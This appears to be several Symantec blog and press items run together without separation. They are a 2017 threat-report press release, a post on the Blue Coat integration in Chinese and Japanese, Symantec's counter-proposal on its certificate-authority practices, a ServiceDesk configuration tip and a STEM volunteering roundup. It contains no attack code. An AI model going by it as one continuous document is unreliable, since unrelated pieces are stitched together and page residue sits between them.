Cyber criminals are executing politically devastating attacks in a move to undermine a new class of targets. Cyber attacks against the U.S. Democratic Party and the subsequent leak of stolen information reflect a trend toward criminals employing highly-publicized, overt campaigns designed to destabilize and disrupt targeted organizations and countries. While cyber attacks involving sabotage have traditionally been quite rare, the perceived success of several campaigns – including the U.S. election and Shamoon – point to a growing trend to criminals attempting to influence politics and sow discord in other countries.

Nation States Chase the Big Scores

A new breed of attackers revealed major financial ambitions, which may be an exercise to help fund other covert and subversive activities. Today, the largest heists are carried out virtually, with billions of dollars stolen by cyber criminals. While some of these attacks are the work of organized criminal gangs, for the first time nation states appear to be involved as well. Symantec uncovered evidence linking North Korea to attacks on banks in Bangladesh, Vietnam, Ecuador and Poland.

“This was an incredibly audacious hack as well as the first time we observed strong indications of nation state involvement in financial cyber crime,” said Kevin Haley, director, Symantec Security Response. “While their sights were set even higher, the attackers stole at least US$94 million.”

Attackers Weaponize Commonly Used Software; Email Becomes the Weapon of Choice

In 2016, Symantec saw cyber criminals use PowerShell, a common scripting language installed on PCs, and Microsoft Office files as weapons. While system administrators may use these common IT tools for daily management tasks, cyber criminals increasingly used this combination for their campaigns as it leaves a lighter footprint and offers the ability to hide in plain sight. Due to the widespread use of PowerShell by attackers, 95 percent of PowerShell files seen by Symantec in the wild were malicious.

The use of email as an infection point also rose, becoming a weapon of choice for cyber criminals and a dangerous threat to users. Symantec found one in 131 emails contained a malicious link or attachment – the highest rate in five years. Further, Business Email Compromise (BEC) scams, which rely on little more than carefully composed spear-phishing emails – scammed more than three billion dollars from businesses over the last three years, targeting over 400 businesses every day.

Caving in to Digital Extortion: Americans Most Likely to Pay Ransom Demands

Ransomware continued to escalate as a global problem and a lucrative business for criminals. Symantec identified over 100 new malware families released into the wild, more than triple the amount seen previously, and a 36 percent increase in ransomware attacks worldwide.

However, the United States is firmly in the crosshairs of attackers as the number-one targeted country. Symantec found 64 percent of American ransomware victims are willing to pay a ransom, compared to 34 percent globally. Unfortunately, this has consequences. In 2016, the average ransom spiked 266 percent with criminals demanding an average of $1,077 per victim up from $294 as reported for the previous year.

Cracks in the Cloud: The Next Frontier for Cyber Crime is Upon Us

A growing reliance on cloud services has left organizations open to attacks. Tens of thousands of cloud databases from a single provider were hijacked and held for ransom in 2016 after users left outdated databases open on the internet without authentication turned on.

Cloud security continues to challenge CIOs. According to Symantec data, CIOs have lost track of how many cloud apps are used inside their organizations. When asked, most assume their organizations use up to 40 cloud apps when in reality the number nears 1,000. This disparity can lead to a lack of policies and procedures for how employees access cloud services, which in turn makes cloud apps riskier. These cracks found in the cloud are taking shape. Symantec predicts that unless CIOs get a firmer grip on the cloud apps used inside their organizations, they will see a shift in how threats enter their environment.

About the Internet Security Threat Report

The Internet Security Threat Report provides an overview and analysis of the year in global threat activity. The report is based on data from Symantec’s Global Intelligence Network, which Symantec analysts use to identify, analyze and provide commentary on emerging trends in attacks, malicious code activity, phishing and spam.

Symantec will host a webinar on this year’s ISTR results on May 16 at 10 a.m. Pacific / 1 p.m. Eastern. For more information or to register, please go here . Please visit Symantec’s website to download the full report plus supplemental assets.

About Symantec

Symantec Corporation (NASDAQ: SYMC), the world’s leading cyber security company, helps organizations, governments and people secure their most important data wherever it lives. Organizations across the world look to Symantec for strategic, integrated solutions to defend against sophisticated attacks across endpoints, cloud and infrastructure. Likewise, a global community of more than 50 million people and families rely on Symantec’s Norton and LifeLock product suites to protect their digital lives at home and across their devices. Symantec operates one of the world’s largest civilian cyber intelligence networks, allowing it to see and protect against the most advanced threats. For additional information, please visit www.symantec.com or connect with us on Facebook, Twitter, and LinkedIn.

###

NOTE TO U.S. EDITORS: If you would like additional information on Symantec Corporation and its products, please visit the Symantec News Room at http://www.symantec.com/news. All prices noted are in U.S. dollars and are valid only in the United States.

Symantec, the Symantec logo and the Checkmark logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

Background Image on Blogs "Quilted" Page: 

Globe Blog Image.jpg

当谈到两个公司整合的时候，我们常将其比喻为1+1=3，即整体要比单独的总和要大。然而，Blue Coat和赛门铁克威胁情报网的整合创建了一个全新的公式：1+1=320万。

在去年十月份，我们宣布了Blue Coat与赛门铁克威胁情报网（内含数万亿条安全数据）整合后的首个成果。在我们为产品深度整合安全遥测、人工智能和机器学习技术之后，赛门铁克的产品每天可多阻挡320万次网络攻击。这种明显的进步主要是因为我们的产品采用了电子邮件遥测技术，以及网络和端点遥测技术。在过去的一年中，通过电邮发起的网络攻击次数明显上升，经恶意网址发起的网络攻击尤多。这意味着各公司需要全面观察电邮、网络流量和端点，并了解网络威胁的整体情况。

赛门铁克和Blue Coat的其他整合成果还包括：赛门铁克现在保护着1.63亿名电邮用户，8000万名网络代理用户，1.7亿名客户及企业端点，相关产品每天要处理近80亿个要求。凭借这种对端点、电邮和网络流量的较高可视级别，赛门铁克能够发现并阻挡原来在任何一个控制点都无法检测到的目标性攻击。而且，两家公司的产品结合为赛门铁克综合性网络防御平台提供了坚实基础，也使赛门铁克的产品能够分享威胁情报，提高了客户在所有控制点上的安全性。

收购Blue Coat之后，赛门铁克成为了唯一一家能够在单一综合性情报平台上提供连接端点、电邮和网络保护的供应商。赛门铁克+Blue = 每天多为我们的客户阻挡320万次网络攻击。事实证明，1+1要比3大得多。

WEBINAR: 2017 Internet Security Threat Report (ISTR): A Review of the Threat Landscape

TIME: 10:00 AM (PST) / 1:00 PM (EST)

DATE: May 16, 2017

SPEAKER: Kevin Haley, Director of Product Management for Symantec Security Technology and Response

2016 saw major shifts in techniques used by targeted attackers, the continued rise of ransomware and significant attacks from IoT devices. 

This webinar will share data from ISTR 22 to better understand the threats and trends that will affect us in 2017. It will cover key findings of the report and best practices to keep us protected in 2017.

Get the facts in this highly respected research report and learn why:

•Targeted attacks aimed at politically motivated sabotage and subversion has increased at alarming rates

•One in 131 emails contained a malicious link or attachment – highest rate in five years

•Size of ransoms spiked 266 percent; U.S. top targeted country as 64 percent of Americans pay their ransom

•CIOs have lost track of how many cloud apps are used inside their companies – When asked most will say up to 40 when in reality the number nears 1,000

Be the first to gain insight into the latest cyber threat trends and learn steps you can take to improve your security posture in 2017.

Please Join Us.. Register Here

We take our role as a key player in the trust ecosystem of the Internet very seriously. We believe that secure and compliant issuance of SSL/TLS certificates is fundamental to the security of the Internet and that we have a responsibility to collaborate with our customers and the broader community to continuously improve industry standards, and specifically our practices, for certificate issuance.

On March 23, Google posted a blog outlining a proposal to change how Symantec’s SSL/TLS certificates are recognized in Chrome. Their proposal stemmed from prior certificate mis-issuances that occurred in our Certificate Authority (CA) business, which we have taken extensive remediation measures to correct. We have carefully reviewed Google’s proposal and sought input from the broader browser and user community on this topic, which has informed our continuous improvement planning. This post outlines important measures that we propose to implement in our CA business. We believe our proposal addresses the concerns raised by Google about our CA business without imposing undue business disruption on our customers and Chrome users that we believe would result if Google implements its proposal.

Feedback from our Enterprise Customers

In addition to our review of public commentary on these issues, we have also sought input and feedback from Symantec customers on the compatibility and interoperability impact of the significant changes that could result from the implementation of Google’s proposal. These customers include many of the largest financial services, critical infrastructure, retail and healthcare organizations in the world, as well as many government agencies. This cohort is an important constituency that we believe has been under-represented to date in the public commentary that has been posted to the Google and Mozilla boards since large organizations rarely authorize employees to engage in such public discussions, particularly in an area related to security. We first solicited feedback to understand the disruption that a browser-initiated trust change, like the one proposed by Google, would cause organizations that opt to replace their existing SSL/TLS certificates in order to maintain interoperability with all browsers. We learned that these organizations’ publicly facing web applications, while extensive, only represent a fraction of their dependency on publicly trusted Symantec roots. Many large organizations have complex, and potentially undocumented and little-known dependencies on their certificate infrastructure. Examples of complex dependencies on Symantec public roots that our customers have shared or we have identified include:

• Embedded devices that are pinned to certificates issued by a Symantec public root to communicate to resources over the Internet or Intranet. Replacing these certificates would result in immediate failures and the need to recode and reimage the firmware for these devices.

• Mobile applications that have pinned certificates. Replacing server certificates would require these applications to be recoded, recompiled and redistributed.

• Critical infrastructure organizations that use certificates issued off of Symantec roots to validate internal and external resources. In many cases, the applications being used are pinned to Symantec certificates.

• Some large organizations use certificates chained to Symantec public roots for nearly all internal applications and communications. Many of these organizations are under regulatory requirements to encrypt even internal communications.

Additionally, many of these organizations estimate that just the planning process to prepare to move to a new certificate authority could take many months and in some cases years because of unknown and undocumented dependencies. Moreover, few large enterprises that we’ve received feedback from have implemented the level of certificate lifecycle automation required to enable safe and cost-effective adoption of shorter validity certificates. We believe that it is important for the broader community to understand and give more weight to these compatibility and interoperability risks, particularly given the fact that many of these organizations are prohibited from commenting publicly on these topics.

To give a perspective of scale, Symantec secures more than 80% of the world’s ecommerce transactions through its certificate infrastructure. Additionally, Symantec is the world’s largest provider of Organization Validation (OV) and Extended Validation (EV) certificates which are primarily used by large enterprises. Many of these certificates sit inside corporate and government networks and are an important part of the trust fabric of internal communications.

In short, our assessment based on customer feedback is that the interoperability and compatibility failures that could result from a large-scale certificate replacement or invalidation event would be significant and unpredictable.

Our Proposal to the Community

We understand the importance of providing transparency into our CA operations and responding to community questions and feedback to inspire trust. We propose to undertake the following actions in response to browser concerns and customer feedback as well as to increase trust and confidence in our processes and our commitment to the compliance frameworks set forth by the CA/B forum and browser root programs.

Our EV Process

Symantec has some of the most comprehensive Extended Validation processes in the industry. We have, on occasion, been criticized for the time it takes us to validate EV certificates while some of our competitors boast rapid (15-20 minute) validation times for EV. We believe that issuing an EV certificate represents the highest bar of certificate validation in the industry and that the process used to validate these certificates must be conducted with the appropriate care. The widespread adoption of Certificate Transparency for EV certificate issuance now makes it possible for independent third parties to compare the accuracy of these issued certificates. One such organization, Netcraft, has been evaluating EV issuance over time. Figure 1 below (source: http://trends.netcraft.com/www.symantec.com) represents their findings of Symantec EV certificate compliance compared to the rest of the industry.

Figure 1 - Symantec vs. Rest of Industry on EV Certificate Requirements.

The Netcraft numbers demonstrate strong EV requirements compliance for Symantec relative to our peers. Our point-in-time and recent period-in-time audits have demonstrated that we are issuing EV certificates in accordance with industry requirements. We are confident in our EV issuance practices, which we have informally benchmarked against other CAs. We believe our EV validation processes are among the most thorough ones employed by any CA. Nevertheless, to reassure the browser community regarding our EV issuance practices we propose to undertake the following:

    1.  We will commission a third party auditor to perform a backward-looking audit of all active EV certificates that have been issued by Symantec to give comfort around the validity and integrity of our EV certificates and our EV certificate issuance practices. This action is proposed as an alternative to Chrome’s suggestion to remove EV treatment of past or future issued EV certificates, which we believe is unjustified. We believe this additional audit of our EV certificates provides full transparency into our EV certificate practices and reaffirms confidence that our active Symantec EV certificates are trustworthy. Our intention is to complete this third party audit by August 31, 2017.

Registration Authority Authenticated and Issued Certificates

Historically, Symantec has issued SSL/TLS certificates either directly or through Registration Authority (RA) partners who have issued such certificates on Symantec’s behalf. We want to provide assurance that all Symantec certificates are properly issued. With these issues in mind:

     2.  We will commission a third party auditor to attest to the list of active certificates that had been issued by any prior SSL/TLS RA partner, including CrossCert, Certisign, Certsuperior and Certisur. The purpose of this action is to provide transparency regarding existing certificates validated by RA personnel. We believe this action also provides additional assurance regarding the efforts we have already undertaken to revalidate all active CrossCert certificates as well as review 100% of the certificates issued by the other former RA partners. Further, we will ask our external auditors to audit 100% of the work we have done to revalidate or review and, where necessary, remediate active certificates issued by all of these former SSL/TLS RA partners. Our intention is to complete this third party audit by August 31, 2017.

Increased Transparency 

We recognize that an accurate understanding of our past incidents is important to enable an objective evaluation of any proposal regarding this topic. We have responded to, and will continue to review and respond to the salient questions posed on the https://wiki.mozilla.org/CA:Symantec_Issues post at the mozilla.dev.security.policy forum to provide further transparency into our past compliance incidents.

Furthermore, we understand the importance of providing increased transparency into our CA operations. As part of our effort to do so, we will do the following:

   3.  We will conduct a six month period-in-time WebTrust audit for the period from December 1, 2016 to May 31, 2017. We will thereafter move to a cadence of quarterly WebTrust audits (in lieu of annual period-in-time audits), beginning with the period from June 1, 2017 through August 31, 2017, until such time as we receive four consecutive quarterly WebTrust audits without qualification. The purpose of this action is to provide greater transparency regarding our operations and new certificates issued by Symantec going forward.

   4.  We will publish a quarterly letter to update the community on the progress of our third party audits identified in this proposal and the progress of our continuous improvement program that incorporates the other actions in this proposal.  

   5.  We will work through the CA/B forum to recommend new (or where applicable, updated) guidelines for appropriate customer exception requests to baseline requests. While the CA/B forum has developed a process for exception requests, we believe it should consider further guidelines to assess the risk associated with these requests and determine conditions under which the CA/B forum might expeditiously approve exception requests.

   6.  We will endeavor to improve the timeliness of our responses to the browser community as well as the level of technical detail we provide in them, balancing the interest of the community to receive prompt responses to their questions with the time required to perform the investigative steps necessary to provide thorough responses to such questions.

Move to Shorter Validity Certificates

We support the added option of shorter validity certificates, as do several browsers and others in the ecosystem. Shorter validity certificates can reduce exposure in the case of an undetected key compromise, enable faster adoption of improvements to industry standards (e.g. move to ECDSA or SHA3), and drive more rapid remediation of potential TLS-related vulnerabilities (like Heartbleed) that can require certificate replacement.

  7.  By August 31, 2017, we will begin to broadly offer SSL/TLS certificates with three month validity periods to give our customers greater choice and flexibility in the validity periods of the certificates they purchase and deploy from Symantec. From the customer feedback we have received to date, we believe this offering may be most attractive to customers that have already enabled automation, such as customers and partners integrated with our APIs and e-commerce customers with less complex environments. In addition, we will continue our investments in automation to enable organizations with even the most complex infrastructure to practically and cost-effectively adopt shorter validity certificates. Our near term investments will focus on modernizing our certificate issuance systems and workflows to enable faster issuance, and developing tools that enable customers to rapidly and securely implement their certificates and configure their systems.

  8.  We will perform a domain revalidation of all issued certificates that have a validity period longer than nine months at the nine-month mark (at no additional cost to our customers). This approach is intended to balance the customer impact of replacing certificates, for those not ready to move to shorter validity certificates, with visibility that ensures that certificates are being used appropriately. We commit to working with the browser community regarding appropriate transparency mechanisms (e.g., an extension of CT logging, OCSP extension, signed DNS text record, or signed revalidation list) that provide an attestation to this revalidation and ensure accountability of our implementation of this action. An initial certificate validation is one level of authentication. Certificate domain revalidation post-deployment further extends the trustworthiness of the initial certificate, which is a positive extension of the CA trust model.

Continuous Improvement of our CA Operations

We seek to continuously improve our systems and processes around certificate issuance. With this in mind:

  9.  We are further increasing our investment in the Security and Risk function of our CA operations, with a focus on our security and compliance controls and risk assessments. As a first step, we are commissioning a third party to conduct a process and systems risk assessment of our CA operations. The scope of this assessment will include an inventory of our systems and use cases, and a review of the security controls we have in place with respect to all of our PKI services, including SSL/TLS certificates. This third party assessment will also incorporate red teaming and penetration testing of our processes and systems beyond what we do already. The purpose of this third party risk assessment, which we expect to complete by October 31, 2017, is to provide increased confidence in the risk management posture of our CA operations beyond WebTrust audit reports.

10.  We will update our Root Program to more directly compartmentalize different certificate use cases. This update will involve creating dedicated roots and/or sub-CAs, for example, to segment customers who today use our publicly trusted hierarchies for closed ecosystems like set-top boxes, for customers who have mixed ecosystems like point-of-sale systems and ATMs which connect to the same servers as browser-based applications, for customers who choose to use longer validity certificates, or for customers who serve disproportionately large web traffic. As certificates expire, we will issue new certificates that chain to the use case-appropriate roots.

11.  Industry analysts estimate that 50% or more of all network attacks targeting enterprises this year will take advantage of SSL/TLS encryption to bypass security controls. We believe that CAs have a necessary and critical role to play in validating whether an encrypted website is malicious. Symantec’s technology infrastructure includes a Global Intelligence Network that analyzes websites, domains, servers and web services at scale and runs both real-time and background checks on such external hosts, including over a billion previously unseen and uncategorized websites a day. Our Global Intelligence Network includes technology that categorizes websites into over 80 categories – e.g., “Financial Services,” “Education,” “Malicious Sources/Malnets” or “Suspicious” – based on linguistic analysis, inter-site relationships, host-attribute analysis and reputation and history. Modules within our Global Intelligence Network analyze site content such as images, video and embedded links and can run in-depth content analysis in over 50 languages to help categorize sites and identify potential risk. We will begin to use our Global Intelligence Network to identify encrypted websites that have an increased threat risk based on our rating categorization and take appropriate action to mitigate risk for our certificates associated with such sites.

Even though our past mis-issuance events have not, to our knowledge, resulted in customer harm, we consider compliance with industry standards a critical responsibility of our CA business. We believe our multi-faceted proposal addresses the concerns regarding the trustworthiness of Symantec’s past and future SSL/TLS certificate issuances. We also believe our proposal appropriately balances these concerns with the significant compatibility and interoperability risks, as well as customer burden, which would result from any proposal that limits the trust of existing Symantec SSL/TLS certificates, imposes shorter validity periods on newly issued Symantec certificates and/or removes EV recognition for our certificates in browsers.

We welcome constructive feedback to our proposal, which we understand may take time for the Internet community to fully consider. In the meantime, we will continue to solicit feedback from our customers and partners, which are important stakeholders that will be impacted by changes to our operations, whether as a result of our proposal or any other.

Background Image on Blogs "Quilted" Page: 

Globe Blog Image.jpg

「1 プラス 1 は 3 になる」 ― 2 つの会社が力を合わせることになったとき、企業間のシナジーということで、よく聞く決まり文句です。つまり、全体は部分の総和より大きくなる、ということです。しかし、Blue Coat とシマンテックの脅威インテリジェンスの統合からは、まったく新しい公式が生まれました。「1 + 1 = 320 万」です。

2016 年 10 月、私たちは Blue Coat とシマンテックの脅威インテリジェンスを統合した最初の成果を発表し、セキュリティデータが兆単位の行に達したとお伝えしました。双方の遠隔測定をさらに統合し、ポートフォリオ全体で人工知能とマシンラーニングに基づく技術を融合した結果、シマンテックの製品は、さらに 320 万の攻撃を毎日遮断するようになっています。ここまで強化できたのは、Web とエンドポイントの遠隔測定を共有しただけでなく、製品を超えてメールの遠隔測定を共有したことが大きい要因でした。過去 1 年間で、悪質な URL を記載したメールを介して実行される攻撃は急増しています。となれば、企業はエンドポイントに加えて、メールと Web トラフィックも残らず可視化し、脅威の状況を詳しく把握しなければなりません。

Blue Coat との統合で実現した成果は、ほかにもあります。1 億 6,300 万人のメールユーザー、8,000 万人の Web プロキシユーザー、コンシューマーとエンタープライズあわせて 1 億 7,500 万のエンドポイントをシマンテックは保護できるようになり、全製品について毎日 80 億件近いセキュリティ要求を処理しています。エンドポイント、メール、Web トラフィックのすべてをこれほどのレベルで可視化したからこそ、1 つの制御ポイントではとうてい検出しえなかった標的型攻撃を、シマンテックは検出し、遮断できるようになりました。しかも、Blue Coat とシマンテックの両ポートフォリオが融合した結果、シマンテックの Integrated Cyber Defense Platform の基盤が確立し、シマンテック製品は脅威インテリジェンスを共有して、あらゆる制御ポイントにわたるお客様に対して、セキュリティを強化できるようになっています。

エンドポイント、メール、Web の保護を単一の統合型インテリジェンスプラットフォームで結び付けられるベンダーは、シマンテックだけです。それを可能にしたのが、Blue Coat の買収でした。Symantec プラス Blue Coat で、さらに 320 万もの攻撃が 1 日に遮断されるようになり、お客様の保護強化につながっています。1 プラス 1 は、3 よりはるかに大きかった、というわけです。

【参考訳】

Incident Management allows tickets to be placed on hold, delaying SLA calculations.  As a part of that hold process a reason must be provided for placing the incident on hold.  There is a default value of None Given, but this is a drop down field that can be easily customized by adding values to the Servicedesk Application Properties.  To do this:

1. Open the ProcessManager Portal
2. Click Admin>Data>Application Properties
3. Click the Gear wheel to the far right of the ServicedeskSettings Profile
4. Choose Display Definition Values
5. On the far right - there is another gear icon - click it and choose Edit Values. Scroll down and under Category:Incident Management, there is a ImHoldReasons section.
6. Click Edit and text representing the reasons (e.g. Vacation, Sickness, More Data Required, etc) you wish to use for placing an incident on hold (.  Make sure to click Save when you are complete.
7. Scroll to the bottom and click Save again.

This should add the options that you want to have referenced

In school we often learn a subject without fully understanding why that subject is important more broadly, and may be applied beyond our studies. In most cases, it is the reason we lose interest at some point with different subjects. Science, math and engineering can easily be one of these subjects. Students often learn the concepts theoretically, but are not exposed to their applications in real life and how central STEM is to many areas outside of science, math, technology and engineering – to nearly all industries.  

Symantec has set a goal to excite, engage, and educate one million students in science, technology, engineering, and math (STEM) education through global nonprofit partnerships, with an emphasis on computer science and cyber security, by 2020 with an investment of $20 million.

We are therefore dedicating time and invested resources (awarding grants) supporting organizations and initiatives that reach students to inspire them with the applicability and importance of STEM subjects. Last quarter, our employees were busy volunteering across the world to help students see and believe the exciting role that STEM plays in our world today and into the future.  

India and Team Everest

Through a partnership with Team Everest, one of India’s largest youth focused nonprofits, Symantec conducted an educational science workshop for seventh and eighth standard school students.

A Symantec volunteer demonstrates STEM principles through engaging activitieswith youth in India.

Through a partnership with Team Everest, one of India’s largest youth focused nonprofits, Symantec conducted an educational science workshop for seventh and eighth standard school students. Working with a Team Everest representative, Symantec helped demonstrate STEM in action for the students.

For example, one activity involved a simple experiment of making a helicopter with a piece of paper. Step-by-step instructions were provided to the students who made and tested their own paper helicopters. Through this, the students walked through the mechanics of how air pressure is central to making helicopter blades rotate. Students were deeply engaged, able to participate and understand how basic science concepts are put into practice in their everyday lives.

Reading and Teen Tech City London

Symantec employees support London’s Tech Tech City event, where cybersecurity games such as creating a fake Facebook account inject fun into STEM and demonstrates the important role of technology and cybersecurity.

Symantec employees in Reading UK, shared their technical expertise at this years TeenTech City event in London, the city’s most inspiring Technology and Science event that was held at the Emirates Stadium, home of Arsenal Football Club. The event brought over 200 scientists, engineers and technologists to this prestigious venue to share a day of challenges and experiments with students from 500 schools across London. Symantec employees facilitated over 50 students and teachers throughout the day, educating them on a Cyber Security Game, and exposing the opportunity for students to experiment with fake face book accounts and individual profiles.

Dublin and I Wish

Only 17% of Irish University first time entrants into computer science are female, only 24% of first time entrants into engineering are female. To help increase interest in STEM, 14 Symantec employees volunteered over 200 hours, throughout two days at the 2017 I Wish STEM event in Dublin. Over 2,000 girls attended the event that this year focused on “how STEM can change the world” to appeal to females who are often looking for a career that has a social impact.

The Symantec volunteer team informed and educated students to help influence their subject choices in school and show them what a career in STEM might look like. It was also an opportunity to engage with their teachers who are significant influencers in the classroom. In total 217 volunteer hours were donated by Symantec employees.

Warsaw and Dom Dickau Orphanage

Employees from Symantec’s Warsaw, Poland office donated recycled IT equipment to the Dom Dickau Orphanage, developing working computers and equipment to help the children research for their studies. Moving forward, the team will offer virtual language lessons to further support their learning.

Employees from Symantec’s Warsaw, Poland office donated recycled IT equipment to the Dom Dickau Orphanage to support student studies.